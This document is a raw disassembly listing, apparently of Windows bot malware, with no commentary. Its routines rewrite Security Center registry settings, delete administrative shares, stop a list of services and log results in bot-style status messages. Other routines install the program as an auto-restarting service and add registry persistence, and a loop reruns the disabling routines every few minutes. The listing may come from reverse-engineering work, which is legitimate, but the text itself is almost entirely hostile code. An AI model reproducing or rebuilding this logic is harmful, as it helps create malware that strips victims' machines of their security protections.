jnz short loc_41ABAF
lea eax, dword_442BDF[esi]
loc_41ABAF: ; CODE XREF: sub_41AA69+13E�j
lea edi, dword_4429D3[esi]
push 1
lea ebx, aSoftwareMicr_5[esi] ; "SOFTWARE\\Microsoft\\Security Center"
push eax
push edi
push ebx
push dword_4428D0[esi]
call sub_41A8F2
add esp, 14h
test eax, eax
jz short loc_41AC34
cmp [ebp+arg_14], 0
jnz loc_41AC99
cmp [ebp+arg_10], 0
jz loc_41AC99
cmp [ebp+arg_C], 0
jnz loc_41AC99
cmp [ebp+arg_0], 0
lea ecx, dword_442AE0[esi]
jnz short loc_41AC02
lea ecx, dword_442BDF[esi]
loc_41AC02: ; CODE XREF: sub_41AA69+191�j
cmp dword_4428D0[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_41AC18
mov edx, offset aHkcu ; "HKCU"
loc_41AC18: ; CODE XREF: sub_41AA69+1A8�j
cmp [ebp+arg_0], 0
mov eax, offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jnz short loc_41AC28
mov eax, offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_41AC28: ; CODE XREF: sub_41AA69+1B8�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSSetSSSToS_ ; "%s Set \"%s\\%s\\%s\" to \"%s\"."
jmp short loc_41AC8B
; ---------------------------------------------------------------------------
loc_41AC34: ; CODE XREF: sub_41AA69+167�j
inc [ebp+var_4]
cmp [ebp+arg_14], 0
jnz short loc_41AC99
cmp [ebp+arg_10], 0
jz short loc_41AC99
cmp [ebp+arg_C], 0
jnz short loc_41AC99
cmp [ebp+arg_0], 0
lea ecx, dword_442AE0[esi]
jnz short loc_41AC5B
lea ecx, dword_442BDF[esi]
loc_41AC5B: ; CODE XREF: sub_41AA69+1EA�j
cmp dword_4428D0[esi], 80000002h
mov edx, offset aHklm ; "HKLM"
jz short loc_41AC71
mov edx, offset aHkcu ; "HKCU"
loc_41AC71: ; CODE XREF: sub_41AA69+201�j
cmp [ebp+arg_0], 0
mov eax, offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jnz short loc_41AC81
mov eax, offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_41AC81: ; CODE XREF: sub_41AA69+211�j
push ecx
push edi
push ebx
push edx
push eax
push offset aSFailedToSet_0 ; "%s Failed to set \"%s\\%s\\%s\" to \"%s\"."
loc_41AC8B: ; CODE XREF: sub_41AA69+BA�j
; sub_41AA69+124�j ...
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4104F6
add esp, 20h
loc_41AC99: ; CODE XREF: sub_41AA69+5C�j
; sub_41AA69+66�j ...
xor edx, edx
loc_41AC9B: ; CODE XREF: sub_41AA69+12C�j
add esi, 410h
cmp esi, 4920h
jb loc_41AA7B
cmp [ebp+var_8], edx
pop edi
pop esi
pop ebx
jnz short loc_41ACEC
cmp [ebp+arg_10], edx
jnz short locret_41AD2A
cmp [ebp+arg_C], edx
jnz short locret_41AD2A
cmp [ebp+arg_14], edx
jnz short locret_41AD2A
cmp [ebp+arg_0], edx
mov ecx, offset aSecured ; "Secured"
jnz short loc_41ACE5
mov ecx, offset aUnsecure ; "Unsecure"
mov eax, offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_41ACD8: ; CODE XREF: sub_41AA69+281�j
push [ebp+var_4]
push edx
push ecx
push eax
push offset aSFailedToSRegi ; "%s Failed to %s Registry, (%.2d/%.2d)"
jmp short loc_41AD1C
; ---------------------------------------------------------------------------
loc_41ACE5: ; CODE XREF: sub_41AA69+263�j
mov eax, offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jmp short loc_41ACD8
; ---------------------------------------------------------------------------
loc_41ACEC: ; CODE XREF: sub_41AA69+24A�j
cmp [ebp+arg_10], edx
jnz short locret_41AD2A
cmp [ebp+arg_C], edx
jnz short locret_41AD2A
cmp [ebp+arg_14], edx
jnz short locret_41AD2A
cmp [ebp+arg_0], edx
mov ecx, offset aSecure ; "Secure"
jnz short loc_41AD2C
mov ecx, offset aUnsecure ; "Unsecure"
mov eax, offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_41AD0F: ; CODE XREF: sub_41AA69+2C8�j
push [ebp+var_4]
push [ebp+var_8]
push ecx
push eax
push offset aSRegistryS_2d_ ; "%s Registry %s, (%.2d/%.2d)"
loc_41AD1C: ; CODE XREF: sub_41AA69+27A�j
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4104F6
add esp, 1Ch
locret_41AD2A: ; CODE XREF: sub_41AA69+24F�j
; sub_41AA69+254�j ...
leave
retn
; ---------------------------------------------------------------------------
loc_41AD2C: ; CODE XREF: sub_41AA69+29A�j
mov eax, offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jmp short loc_41AD0F
sub_41AA69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD33 proc near ; CODE XREF: sub_41B226+53�p
; sub_41B226+D6�p
var_2034 = byte ptr -2034h
var_1034 = byte ptr -1034h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 2034h
call sub_4220C0
push ebx
xor ebx, ebx
cmp [ebp+arg_0], ebx
push esi
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
jz loc_41AF6E
cmp [ebp+arg_14], ebx
mov [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_41AD85
cmp [ebp+arg_C], ebx
jnz short loc_41AD85
push offset aErased ; "erased"
push offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
lea eax, [ebp+var_1034]
push offset dword_447780
push eax
call sub_422063
add esp, 10h
loc_41AD85: ; CODE XREF: sub_41AD33+2D�j
; sub_41AD33+32�j ...
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push ebx
call dword_454240
cmp eax, ebx
mov [ebp+var_14], eax
jz loc_41AE30
cmp eax, 0EAh
jz short loc_41AE30
xor esi, esi
loc_41ADB7: ; CODE XREF: sub_41AD33+F6�j
push ebx
push off_4471F0[esi]
push ebx
call dword_4541CC
test eax, eax
jnz short loc_41AE20
cmp [ebp+arg_14], ebx
jnz short loc_41AE1D
cmp [ebp+arg_C], ebx
jnz short loc_41AE1D
cmp [ebp+arg_10], ebx
jz short loc_41AE1D
cmp [ebp+var_4], ebx
jle short loc_41ADF0
lea eax, [ebp+var_1034]
push offset dword_43EA04
push eax
call sub_423270
pop ecx
pop ecx
loc_41ADF0: ; CODE XREF: sub_41AD33+A8�j
push off_4471F0[esi]
lea eax, [ebp+var_2034]
push offset off_44777C
push eax
call sub_422063
lea eax, [ebp+var_2034]
push eax
lea eax, [ebp+var_1034]
push eax
call sub_423270
add esp, 14h
loc_41AE1D: ; CODE XREF: sub_41AD33+99�j
; sub_41AD33+9E�j ...
inc [ebp+var_4]
loc_41AE20: ; CODE XREF: sub_41AD33+94�j
add esi, 8
cmp esi, 138h
jb short loc_41ADB7
jmp loc_41AEC2
; ---------------------------------------------------------------------------
loc_41AE30: ; CODE XREF: sub_41AD33+75�j
; sub_41AD33+80�j
mov edi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+arg_0], ebx
jb short loc_41AEB7
loc_41AE3B: ; CODE XREF: sub_41AD33+182�j
mov esi, [edi]
push esi
call sub_424B08
cmp word ptr [esi+eax*2-2], 24h
pop ecx
jnz short loc_41AEAE
push 0
push esi
push 0
call dword_4541CC
test eax, eax
jnz short loc_41AEAE
cmp [ebp+arg_14], eax
jnz short loc_41AEAB
cmp [ebp+arg_C], eax
jnz short loc_41AEAB
cmp [ebp+arg_10], eax
jz short loc_41AEAB
cmp [ebp+var_4], eax
jle short loc_41AE82
lea eax, [ebp+var_1034]
push offset dword_43EA04
push eax
call sub_423270
pop ecx
pop ecx
loc_41AE82: ; CODE XREF: sub_41AD33+13A�j
push dword ptr [edi]
lea eax, [ebp+var_2034]
push offset off_44777C
push eax
call sub_422063
lea eax, [ebp+var_2034]
push eax
lea eax, [ebp+var_1034]
push eax
call sub_423270
add esp, 14h
loc_41AEAB: ; CODE XREF: sub_41AD33+12B�j
; sub_41AD33+130�j ...
inc [ebp+var_4]
loc_41AEAE: ; CODE XREF: sub_41AD33+117�j
; sub_41AD33+126�j
add edi, 28h
inc ebx
cmp ebx, [ebp+arg_0]
jbe short loc_41AE3B
loc_41AEB7: ; CODE XREF: sub_41AD33+106�j
push [ebp+var_8]
call dword_4543A0
xor ebx, ebx
loc_41AEC2: ; CODE XREF: sub_41AD33+F8�j
cmp [ebp+var_14], 0EAh
jz loc_41AD85
cmp [ebp+arg_10], ebx
jz short loc_41AF40
cmp [ebp+arg_14], ebx
jnz loc_41B0AB
cmp [ebp+arg_C], ebx
jnz loc_41B0AB
cmp [ebp+var_4], ebx
jnz short loc_41AEFA
loc_41AEEB: ; CODE XREF: sub_41AD33+222�j
push offset aErased ; "erased"
push offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jmp loc_41B05D
; ---------------------------------------------------------------------------
loc_41AEFA: ; CODE XREF: sub_41AD33+1B6�j
push [ebp+var_4]
push offset aErased ; "erased"
push offset aTotalSharesSD ; " Total shares: [%s: %d]"
loc_41AF07: ; CODE XREF: sub_41AD33+348�j
lea eax, [ebp+var_2034]
push eax
call sub_422063
lea eax, [ebp+var_2034]
push eax
lea eax, [ebp+var_1034]
push eax
call sub_423270
lea eax, [ebp+var_1034]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4104F6
add esp, 24h
jmp loc_41B0AB
; ---------------------------------------------------------------------------
loc_41AF40: ; CODE XREF: sub_41AD33+19F�j
cmp [ebp+arg_14], ebx
jnz loc_41B0AB
cmp [ebp+arg_C], ebx
jnz loc_41B0AB
cmp [ebp+var_4], ebx
jz short loc_41AEEB
push [ebp+var_4]
push offset aErased ; "erased"
push offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
push offset aSTotalSharesSD ; "%s Total shares %s: [%d]"
jmp loc_41B09D
; ---------------------------------------------------------------------------
loc_41AF6E: ; CODE XREF: sub_41AD33+1B�j
cmp [ebp+arg_14], ebx
mov edi, offset aCreated ; "created"
jnz short loc_41AF97
cmp [ebp+arg_C], ebx
jnz short loc_41AF97
push edi
push offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
lea eax, [ebp+var_1034]
push offset dword_447780
push eax
call sub_422063
add esp, 10h
loc_41AF97: ; CODE XREF: sub_41AD33+243�j
; sub_41AD33+248�j
mov [ebp+arg_0], ebx
xor esi, esi
loc_41AF9C: ; CODE XREF: sub_41AD33+30A�j
mov eax, off_4471F0[esi]
mov [ebp+var_30], ebx
mov [ebp+var_34], eax
mov eax, dword_4471F4[esi]
mov [ebp+var_1C], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_34]
push eax
push 2
push ebx
mov [ebp+var_2C], offset aUnloading ; "Unloading"
mov [ebp+var_28], ebx
mov [ebp+var_24], 4
mov [ebp+var_20], ebx
mov [ebp+var_18], ebx
call dword_4541EC
test eax, eax
jnz short loc_41B034
cmp [ebp+arg_14], ebx
jnz short loc_41B031
cmp [ebp+arg_C], ebx
jnz short loc_41B031
cmp [ebp+arg_10], ebx
jz short loc_41B031
cmp [ebp+var_8], ebx
jle short loc_41B004
lea eax, [ebp+var_1034]
push offset dword_43EA04
push eax
call sub_423270
pop ecx
pop ecx
loc_41B004: ; CODE XREF: sub_41AD33+2BC�j
push off_4471F0[esi]
lea eax, [ebp+var_2034]
push offset off_44777C
push eax
call sub_422063
lea eax, [ebp+var_2034]
push eax
lea eax, [ebp+var_1034]
push eax
call sub_423270
add esp, 14h
loc_41B031: ; CODE XREF: sub_41AD33+2AD�j
; sub_41AD33+2B2�j ...
inc [ebp+var_8]
loc_41B034: ; CODE XREF: sub_41AD33+2A8�j
add esi, 8
cmp esi, 138h
jb loc_41AF9C
cmp [ebp+arg_10], ebx
jz short loc_41B080
cmp [ebp+arg_14], ebx
jnz short loc_41B0AB
cmp [ebp+arg_C], ebx
jnz short loc_41B0AB
cmp [ebp+var_8], ebx
jnz short loc_41B072
loc_41B057: ; CODE XREF: sub_41AD33+35A�j
push edi
push offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_41B05D: ; CODE XREF: sub_41AD33+1C2�j
push offset aSNoSharesS_ ; "%s No shares %s."
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4104F6
add esp, 14h
jmp short loc_41B0AB
; ---------------------------------------------------------------------------
loc_41B072: ; CODE XREF: sub_41AD33+322�j
push [ebp+var_8]
push edi
push offset aTotalSharesS_0 ; " Total shares [%s: %d]"
jmp loc_41AF07
; ---------------------------------------------------------------------------
loc_41B080: ; CODE XREF: sub_41AD33+313�j
cmp [ebp+arg_C], ebx
jnz short loc_41B0AB
cmp [ebp+arg_14], ebx
jnz short loc_41B0AB
cmp [ebp+var_8], ebx
jz short loc_41B057
push [ebp+var_8]
push edi
push offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
push offset aSTotalShares_0 ; "%s Total shares [%s: %d]"
loc_41B09D: ; CODE XREF: sub_41AD33+236�j
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4104F6
add esp, 18h
loc_41B0AB: ; CODE XREF: sub_41AD33+1A4�j
; sub_41AD33+1AD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41AD33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0B0 proc near ; CODE XREF: sub_41B226+3D�p
; sub_41B226+93�p
var_24 = byte ptr -24h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
xor edi, edi
mov [ebp+var_4], edi
mov esi, offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
loc_41B0C3: ; CODE XREF: sub_41B0B0+119�j
push 0F003Fh
push offset aServicesactive ; "ServicesActive"
push 0
call dword_454304 ; OpenSCManagerA
push 0F01FFh
mov [ebp+var_8], eax
push off_4428A8[edi]
push eax
call dword_4541D4 ; OpenServiceA
mov ebx, eax
test ebx, ebx
jnz short loc_41B12C
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 424h
jnz loc_41B1B3
xor eax, eax
cmp [ebp+arg_C], eax
jz loc_41B1B3
cmp [ebp+arg_10], eax
jnz loc_41B1B3
cmp [ebp+arg_8], eax
jnz loc_41B1B3
push off_4428BC[edi]
push esi
push offset aSTheSServiceDo ; "%s The %s service does not exist."
jmp short loc_41B1A5
; ---------------------------------------------------------------------------
loc_41B12C: ; CODE XREF: sub_41B0B0+3E�j
lea eax, [ebp+var_24]
push eax
push 1
push ebx
call dword_454244 ; ControlService
test eax, eax
jz short loc_41B17A
lea eax, [ebp+var_24]
push eax
push 1
push ebx
call dword_454244 ; ControlService
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_41B175
cmp [ebp+arg_10], eax
jnz short loc_41B175
cmp [ebp+arg_8], eax
jnz short loc_41B175
push off_4428BC[edi]
push esi
push offset aSSServiceStopp ; "%s %s service stopped."
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4104F6
add esp, 14h
loc_41B175: ; CODE XREF: sub_41B0B0+9F�j
; sub_41B0B0+A4�j ...
inc [ebp+var_4]
jmp short loc_41B1B3
; ---------------------------------------------------------------------------
loc_41B17A: ; CODE XREF: sub_41B0B0+8B�j
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 426h
jnz short loc_41B1B3
cmp [ebp+arg_C], 0
jz short loc_41B1B3
cmp [ebp+arg_10], 0
jnz short loc_41B1B3
cmp [ebp+arg_8], 0
jnz short loc_41B1B3
push off_4428BC[edi]
push esi
push offset aSTheSServiceWa ; "%s The %s service was not started."
loc_41B1A5: ; CODE XREF: sub_41B0B0+7A�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4104F6
add esp, 14h
loc_41B1B3: ; CODE XREF: sub_41B0B0+4B�j
; sub_41B0B0+56�j ...
push ebx
call dword_4541F0 ; CloseServiceHandle
push [ebp+var_8]
call dword_4541F0 ; CloseServiceHandle
add edi, 4
cmp edi, 14h
jl loc_41B0C3
xor eax, eax
cmp [ebp+var_4], eax
jnz short loc_41B1FB
cmp [ebp+arg_10], eax
jnz short loc_41B221
cmp [ebp+arg_8], eax
jnz short loc_41B221
cmp [ebp+arg_C], eax
jnz short loc_41B221
push esi
push offset aSNoServicesSto ; "%s No services stopped."
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4104F6
add esp, 10h
jmp short loc_41B221
; ---------------------------------------------------------------------------
loc_41B1FB: ; CODE XREF: sub_41B0B0+124�j
cmp [ebp+arg_10], eax
jnz short loc_41B221
cmp [ebp+arg_8], eax
jnz short loc_41B221
cmp [ebp+arg_C], eax
jnz short loc_41B221
push [ebp+var_4]
push esi
push offset aSTotalServices ; "%s Total services stopped: %d"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4104F6
add esp, 14h
loc_41B221: ; CODE XREF: sub_41B0B0+129�j
; sub_41B0B0+12E�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B0B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B226 proc near ; DATA XREF: sub_403B2C+7359�o
; sub_412267+11C�o
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = dword ptr -1BCh
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_190 = dword ptr -190h
var_18C = dword ptr -18Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 240h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp+var_240]
rep movsd
xor edi, edi
xor esi, esi
inc edi
cmp [ebp+var_1A8], esi
mov [eax+0BCh], edi
jz short loc_41B28E
loc_41B256: ; CODE XREF: sub_41B226+66�j
cmp dword_4543E8, esi
jnz short loc_41B281
push edi
push esi
push edi
push esi
push esi
call sub_41B0B0
push edi
push esi
push edi
push esi
push esi
push edi
call sub_41AA69
push edi
push esi
push edi
push esi
push esi
push edi
call sub_41AD33
add esp, 44h
loc_41B281: ; CODE XREF: sub_41B226+36�j
push 927C0h
call dword_42F15C ; Sleep
jmp short loc_41B256
; ---------------------------------------------------------------------------
loc_41B28E: ; CODE XREF: sub_41B226+2E�j
cmp dword_4543E8, esi
mov edi, [ebp+var_240]
jnz short loc_41B304
cmp [ebp+var_1AC], esi
jz short loc_41B2C1
push esi
lea eax, [ebp+var_23C]
push [ebp+var_190]
push [ebp+var_18C]
push eax
push edi
call sub_41B0B0
add esp, 14h
loc_41B2C1: ; CODE XREF: sub_41B226+7C�j
push esi
lea eax, [ebp+var_23C]
push [ebp+var_190]
push [ebp+var_18C]
push eax
push edi
push [ebp+var_1AC]
call sub_41AA69
push esi
lea eax, [ebp+var_23C]
push [ebp+var_190]
push [ebp+var_18C]
push eax
push edi
push [ebp+var_1AC]
call sub_41AD33
add esp, 30h
loc_41B304: ; CODE XREF: sub_41B226+74�j
push [ebp+var_1BC]
call sub_41C059
pop ecx
push esi
call dword_42F150 ; ExitThread
pop edi
pop esi
loc_41B319: ; DATA XREF: sub_41B387+12�o
cmp [esp+244h+var_240], 5
push esi
jnz short loc_41B368
mov esi, offset dword_4554B0
mov ecx, esi
call sub_411123
test al, al
jz short loc_41B35E
push offset aSystemShutting ; "System shutting down."
push esi
call sub_41015C
pop ecx
pop ecx
push 1F4h
call dword_42F15C ; Sleep
mov ecx, esi
call sub_41012A
call dword_454258 ; WSACleanup
push 0
call dword_42F06C ; ExitProcess
loc_41B35E: ; CODE XREF: sub_41B226+109�j
mov dword_46C3F0, 7
loc_41B368: ; CODE XREF: sub_41B226+F9�j
push offset dword_46C3EC
push dword_46C3E8
call dword_45426C ; SetServiceStatus
test eax, eax
jnz short loc_41B383
call dword_42F068 ; RtlGetLastWin32Error
loc_41B383: ; CODE XREF: sub_41B226+155�j
pop esi
retn 4
sub_41B226 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B387 proc near ; DATA XREF: sub_4120E9+4D�o
var_4 = byte ptr -4
push ecx
push esi
push edi
push 4
xor esi, esi
pop edi
mov dword_46C3EC, 30h
push offset loc_41B319
push offset dword_439068
mov dword_46C3F0, 2
mov dword_46C3F4, edi
mov dword_46C3F8, esi
mov dword_46C3FC, esi
mov dword_46C400, esi
mov dword_46C404, esi
call dword_454328 ; RegisterServiceCtrlHandlerA
push offset dword_46C3EC
push eax
mov dword_46C3E8, eax
mov dword_46C3F0, edi
mov dword_46C400, esi
mov dword_46C404, esi
call dword_45426C ; SetServiceStatus
lea eax, [esp+0Ch+var_4]
push eax
push esi
push esi
push offset sub_41B537
push esi
push esi
call dword_42F158 ; CreateThread
mov edi, eax
cmp edi, esi
jz short loc_41B41E
push 0FFFFFFFFh
push edi
call dword_42F064 ; WaitForSingleObject
push edi
call dword_42F038 ; CloseHandle
loc_41B41E: ; CODE XREF: sub_41B387+85�j
pop edi
xor eax, eax
pop esi
pop ecx
retn
sub_41B387 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B424 proc near ; CODE XREF: sub_4120E9+122�p
; sub_4120E9+170�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_104]
push offset aS_3 ; "\"%s\""
push eax
call sub_422063
add esp, 0Ch
xor esi, esi
push 2
push esi
push esi
call dword_454304 ; OpenSCManagerA
cmp eax, esi
mov dword_46C3E4, eax
jnz short loc_41B464
push [ebp+arg_0]
call sub_41B69D
pop ecx
loc_41B464: ; CODE XREF: sub_41B424+35�j
push esi
push esi
push esi
push esi
lea eax, [ebp+var_104]
push esi
push eax
push esi
push 2
push 110h
push 0F01FFh
push offset dword_439098
push offset dword_439068
push dword_46C3E4
call dword_45437C ; CreateServiceA
mov edi, eax
cmp edi, esi
jnz short loc_41B4B8
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 436h
jz short loc_41B4C3
cmp eax, 431h
jz short loc_41B4C3
push [ebp+arg_0]
call sub_41B69D
pop ecx
jmp short loc_41B4C8
; ---------------------------------------------------------------------------
loc_41B4B8: ; CODE XREF: sub_41B424+73�j
push offset dword_4390C8
call sub_41B575
pop ecx
loc_41B4C3: ; CODE XREF: sub_41B424+80�j
; sub_41B424+87�j
call sub_41B4E1
loc_41B4C8: ; CODE XREF: sub_41B424+92�j
push edi
call dword_4541F0 ; CloseServiceHandle
push dword_46C3E4
call dword_4541F0 ; CloseServiceHandle
pop edi
xor eax, eax
pop esi
leave
retn
sub_41B424 endp
; =============== S U B R O U T I N E =======================================
sub_41B4E1 proc near ; CODE XREF: sub_41B424:loc_41B4C3�p
push esi
push 0F003Fh
push 0
push 0
call dword_454304 ; OpenSCManagerA
test eax, eax
mov dword_46C3E4, eax
jz short loc_41B533
push 0F01FFh
push offset dword_439068
push eax
call dword_4541D4 ; OpenServiceA
mov esi, eax
test esi, esi
jz short loc_41B533
push 0
push 0
push esi
call dword_4541DC ; StartServiceA
test eax, eax
jz short loc_41B533
push dword_46C3E4
call dword_4541F0 ; CloseServiceHandle
push esi
call dword_4541F0 ; CloseServiceHandle
loc_41B533: ; CODE XREF: sub_41B4E1+17�j
; sub_41B4E1+2E�j ...
xor eax, eax
pop esi
retn
sub_41B4E1 endp
; =============== S U B R O U T I N E =======================================
sub_41B537 proc near ; DATA XREF: sub_41B387+74�o
var_4 = byte ptr -4
push ecx
push esi
push edi
lea eax, [esp+0Ch+var_4]
xor edi, edi
push eax
push edi
push edi
push offset sub_412267
push edi
push edi
call dword_42F158 ; CreateThread
mov esi, eax
cmp esi, edi
jnz short loc_41B55E
pop edi
xor eax, eax
pop esi
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_41B55E: ; CODE XREF: sub_41B537+1D�j
push 0FFFFFFFFh
push esi
call dword_42F064 ; WaitForSingleObject
push esi
call dword_42F038 ; CloseHandle
push edi
call dword_42F150 ; ExitThread
sub_41B537 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B575 proc near ; CODE XREF: sub_41B424+99�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push 0F003Fh
inc edi
push ebx
push ebx
mov [ebp+var_8], edi
call dword_454304 ; OpenSCManagerA
cmp eax, ebx
mov dword_46C3E4, eax
jz short loc_41B600
mov esi, offset dword_439068
push 0F01FFh
push esi
push eax
call dword_4541D4 ; OpenServiceA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_41B600
push dword_46C3E4
call dword_454208 ; LockServiceDatabase
cmp eax, ebx
mov [ebp+var_14], eax
jnz short loc_41B612
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 41Fh
jnz short loc_41B600
mov ebx, 10Ch
push ebx
push 40h
call dword_42F114 ; LocalAlloc
test eax, eax
mov [ebp+var_C], eax
jz short loc_41B600
lea ecx, [ebp+var_18]
push ecx
push ebx
push eax
push dword_46C3E4
call dword_454284 ; QueryServiceLockStatusA
test eax, eax
jnz short loc_41B607
loc_41B600: ; CODE XREF: sub_41B575+25�j
; sub_41B575+3E�j ...
xor eax, eax
jmp loc_41B698
; ---------------------------------------------------------------------------
loc_41B607: ; CODE XREF: sub_41B575+89�j
push [ebp+var_C]
call dword_42F030 ; LocalFree
xor ebx, ebx
loc_41B612: ; CODE XREF: sub_41B575+51�j
push 2
push esi
push dword_46C3E4
call dword_4541D4 ; OpenServiceA
mov dword_46C3E4, eax
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea eax, [ebp+var_34]
push eax
push 2
push [ebp+var_4]
mov [ebp+var_1C], 0BB8h
mov [ebp+var_20], edi
mov [ebp+var_28], edi
mov [ebp+var_2C], ebx
mov [ebp+var_30], ebx
mov [ebp+var_34], 0Ah
call dword_4543CC ; ChangeServiceConfig2A
test eax, eax
jnz short loc_41B65C
mov [ebp+var_8], ebx
loc_41B65C: ; CODE XREF: sub_41B575+E2�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push edi
push [ebp+var_4]
call dword_4543CC ; ChangeServiceConfig2A
test eax, eax
jnz short loc_41B677
mov [ebp+var_8], ebx
loc_41B677: ; CODE XREF: sub_41B575+FD�j
push [ebp+var_14]
call dword_45432C ; UnlockServiceDatabase
push [ebp+var_4]
call dword_4541F0 ; CloseServiceHandle
push dword_46C3E4
call dword_4541F0 ; CloseServiceHandle
mov eax, [ebp+var_8]
loc_41B698: ; CODE XREF: sub_41B575+8D�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B575 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B69D proc near ; CODE XREF: sub_41B424+3A�p
; sub_41B424+8C�p
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_15B = byte ptr -15Bh
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 364h
push ebx
push esi
push edi
lea eax, [ebp+var_364]
push 104h
xor ebx, ebx
push eax
push ebx
call dword_42F074 ; GetModuleHandleA
push eax
call dword_42F154 ; GetModuleFileNameA
push 40h
xor eax, eax
pop ecx
lea edi, [ebp+var_15B]
mov [ebp+var_15C], bl
push ebx
rep stosd
push dword_439018
stosw
stosb
lea eax, [ebp+var_15C]
push eax
push ebx
call dword_42F234
mov esi, dword_42F04C
lea eax, [ebp+var_15C]
push eax
push offset dword_4553A8
call esi ; dword_42F04C
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
call esi ; dword_42F04C
mov esi, offset loc_439030
lea eax, [ebp+var_260]
push esi
push eax
push offset dword_43C270
push [ebp+arg_0]
call sub_422063
lea eax, [ebp+var_260]
push esi
push eax
call sub_41F01F
add esp, 18h
test eax, eax
jz loc_41B7F6
push 1
mov edi, offset byte_439233
push [ebp+arg_0]
mov esi, offset dword_439134
push edi
push esi
push 80000001h
call sub_41A8F2
push 1
push [ebp+arg_0]
push edi
push esi
push dword_439130
call sub_41A8F2
